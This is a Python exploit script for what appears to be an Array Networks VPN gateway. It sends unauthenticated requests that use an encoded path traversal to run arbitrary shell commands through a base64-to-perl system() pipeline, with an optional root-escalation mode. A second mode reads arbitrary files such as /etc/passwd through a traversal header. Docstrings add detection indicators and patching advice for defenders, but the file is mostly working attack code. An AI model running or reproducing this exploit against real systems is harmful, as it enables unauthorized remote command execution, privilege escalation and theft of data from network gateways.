array_exp.py
import requests,sys,argparse
import warnings,re
import urllib.parse,base64
# Silences every warning category for the whole process. Together with
# verify=False on the requests below, this also hides urllib3's
# InsecureRequestWarning, so nothing tells the operator that the server
# certificate is never validated.
warnings.filterwarnings('ignore')

# Browser-like headers shared by every request in this file.
# NOTE: this dict is module-level and is mutated in place by Exec() and
# PathCrossing(); an X_AN_FILESHARE value set by one call stays in the dict
# for any later call in the same process.
# For log review: the User-Agent pairs "X11" with "Windows x86_64", which a
# stock browser is not expected to send. It is only a weak indicator, since
# the value is a plain constant anyone can edit.
headers = {
    "User-Agent": (
        "Mozilla/5.0 (X11; Windows x86_64; rv:109.0) "
        "Gecko/20100101 Firefox/111.0"
    ),
    "Accept": (
        "text/html,application/xhtml+xml,application/xml;q=0.9,"
        "image/avif,image/webp,*/*;q=0.8"
    ),
    "Accept-Language": (
        "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
    ),
}
def Exec(ip_, cmd, flag):
    """Send the PoC's command-execution request and print the response body.

    A single GET goes to ``<ip_>/prx/000/http/localhost/client_sec%2f..%2fcifs``.
    Its ``path`` query parameter holds a shell pipeline that base64-decodes
    ``cmd`` and runs it through ``perl``. The request carries no cookie or
    credential; only the shared ``headers`` dict plus ``X_AN_FILESHARE`` is sent.

    Args:
        ip_: Base URL of the target (scheme and host); the URI is appended as-is.
        cmd: Command string to embed in the request.
        flag: When true, ``cmd`` is first wrapped in an invocation of
            ``/ca_upgrade/ca/bin/webui_localdb_file``. The CLI help describes
            this as "Get root"; what that binary does is not visible here.

    Review notes (defender view):
        * Log/WAF indicators visible in this request: an encoded traversal
          segment ``client_sec%2f..%2f`` under ``/prx/000/http/localhost/``,
          an ``X_AN_FILESHARE`` request header, and a ``path`` parameter that
          begins with ``|`` and contains ``decode_base64``.
        * ``verify=False`` disables TLS certificate validation, so the peer is
          not authenticated and the response could come from an interceptor.
        * A 200 response to this URI from an unauthenticated client is itself
          worth alerting on. The durable fix is the vendor's patched firmware;
          until then, restrict who can reach the gateway's web interface.
    """
    target = ip_ + "/prx/000/http/localhost/client_sec%2f..%2fcifs"

    # Optionally route the command through the on-box helper binary.
    payload = cmd
    if flag:
        payload = '/ca_upgrade/ca/bin/webui_localdb_file c "|{}"'.format(cmd)

    # Base64 keeps quoting and metacharacters in cmd from breaking the pipeline.
    encoded = base64.b64encode(payload.encode('utf-8')).decode("utf-8")

    query = {
        'service': '//AfterLogOnCmd: command not found/temp/',
        'path': "|echo {} | perl -MMIME::Base64 -ne 'system(decode_base64($_))'|".format(encoded),
    }

    # Mutates the module-level headers dict; the value persists after return.
    headers["X_AN_FILESHARE"] = "acls=permit"

    resp = requests.get(
        target,
        params=query,
        headers=headers,
        verify=False,
        allow_redirects=False,
    )
    print(resp.text)
def PathCrossing(ip_, path):
    """Send the PoC's file-read request and print the extracted content.

    A GET goes to ``<ip_>/prx/000/http/localhost/client_sec%2f..%2faddfolder``
    with the header ``X_AN_FILESHARE: fshare_template=../../..<path>;``. If the
    response contains the expected page markers, only the text between them
    is printed; otherwise the whole body is printed.

    Args:
        ip_: Base URL of the target (scheme and host); the URI is appended as-is.
        path: Path string appended after ``../../..`` in the header value.

    Review notes (defender view):
        * Indicators visible in this request: the encoded traversal segment
          ``client_sec%2f..%2f`` in the URI and an ``X_AN_FILESHARE`` header
          whose value contains ``fshare_template=`` followed by ``../``.
          Header values often go unlogged, so capture this header at the
          proxy or WAF if detection is needed.
        * ``verify=False`` disables TLS certificate validation.
        * Redirects are followed here (no ``allow_redirects=False``), unlike
          the other two request helpers in this file.
    """
    target = ip_ + "/prx/000/http/localhost/client_sec%2f..%2faddfolder"

    # Mutates the module-level headers dict; the value persists after return.
    headers["X_AN_FILESHARE"] = "fshare_template=../../..{};".format(path)

    resp = requests.get(target, headers=headers, verify=False)
    body = resp.text

    # Lookbehind/lookahead bracket the span between the NSLib.js script tag
    # and the "No message available" table row of the rendered page.
    pattern = r'(?<=<script\slanguage="JavaScript"\ssrc="\/prx\/001\/http\/localhost\/NSLib\.js"><\/script>)[\s\S]*(?=<tr>\n<td class="title">No message available<\/td>)'
    found = re.search(pattern, body)

    print(found.group(0) if found else body)
def GetVersion(ip_):
    """Fetch ``NSLib.js`` from the target and print a version string, if found.

    The response body is searched for ``src=".../NSLib.js?v=<value>"``
    references and the first captured ``<value>`` is printed.

    Args:
        ip_: Base URL of the target (scheme and host); the URI is appended as-is.

    Review notes:
        * The version is printed only when at least TWO references match; a
          single match falls through to "Get version error".
          NOTE(review): this may be an off-by-one (``>= 1`` intended?) --
          confirm against a real response before relying on the output.
        * ``verify=False`` disables TLS certificate validation, so the
          reported version is not authenticated.
        * For asset inventory, a version string served to an unauthenticated
          client is the same information an external scanner obtains.
    """
    target = ip_ + "/prx/001/http/localhost/NSLib.js"
    resp = requests.get(
        target,
        headers=headers,
        verify=False,
        allow_redirects=False,
    )

    versions = re.findall(
        r'src="\/prx\/001\/http\/localhost\/NSLib\.js\?v=([^\"]*)"',
        resp.text,
    )

    if len(versions) <= 1:
        print("Get version error")
        return
    print(versions[0])
def main():
    """Parse the command line and dispatch to the selected mode.

    ``-m`` selects ``exec``, ``path`` or ``version``; ``-u`` is the base URL;
    ``-e`` is the command (exec) or path (path); ``--root`` is passed to
    ``Exec`` as its ``flag`` argument.

    Review notes:
        * No argument is marked required and none is validated. A missing
          ``-u`` reaches the helpers as ``None`` and fails with a TypeError
          on string concatenation instead of a usage message.
        * The fallback message lists only "exec or path" although "version"
          is also accepted.
        * Nothing here limits which host ``-u`` may point at; use against
          systems without authorization is outside any legitimate test scope.
    """
    parser = argparse.ArgumentParser(
        description="-m exec|path|version -u url -e whoami|/etc/passwd"
    )
    parser.add_argument('-m', help='exec or path or version')
    parser.add_argument('-u', help='url')
    parser.add_argument('-e', help='Command to run or path to access')
    parser.add_argument(
        '--root',
        help='Get root by webui_localdb_file',
        action='store_true',
    )
    args = parser.parse_args()

    # Lazily-evaluated dispatch table: only the selected mode is called.
    modes = {
        "exec": lambda: Exec(args.u, args.e, args.root),
        "path": lambda: PathCrossing(args.u, args.e),
        "version": lambda: GetVersion(args.u),
    }
    handler = modes.get(args.m)
    if handler is None:
        print('module error, exec or path')
    else:
        handler()
# Run the CLI only when executed as a script, not when imported.
if __name__ == '__main__':
    main()